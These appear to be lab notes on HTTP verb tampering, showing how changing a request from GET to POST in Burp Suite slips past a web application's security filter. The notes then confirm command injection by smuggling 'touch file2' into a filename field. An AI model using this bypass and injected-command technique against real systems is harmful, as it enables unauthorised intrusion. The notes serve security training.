insecure coding errors are made during the development of the web application. this is where the web application doesn't cover all HTTP methods in certain functionalities. it is commonly found in security filters that detect malicious requests
#identify the restricted page by walking the application
root@oco:~$ BROWSER > {targetSite:port}
input field: {arbitraryValue};
output: Malicious Request Denied!
* semi-colon is used to test the webapp's security filtering mechanism
#intercept & change the request method
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
input field: {arbitraryValue};
BURP > Proxy
Request
...
POST /index.php HTTP/1.1 //changed from GET to POST
Host: 94.237.54.116:31220
Referer: http://94.237.54.116:31220/index.php
Content-Type: application/x-www-form-urlencoded
filename=test2%3B
* changing the HTTP Request may bypass the security filter
#confirm bypass through cmd injection vulnerability
BURP > Proxy > Change Request Method
input field: file1; touch file2;
Request
...
POST /index.php HTTP/1.1 //changed from GET to POST
POST /index.php HTTP/1.1
Host: 94.237.54.116:31220
Referer: http://94.237.54.116:31220/index.php
Content-Type: application/x-www-form-urlencoded
filename=file1%3B+touch+file2%3B
* forward the modified request as many times as necessary
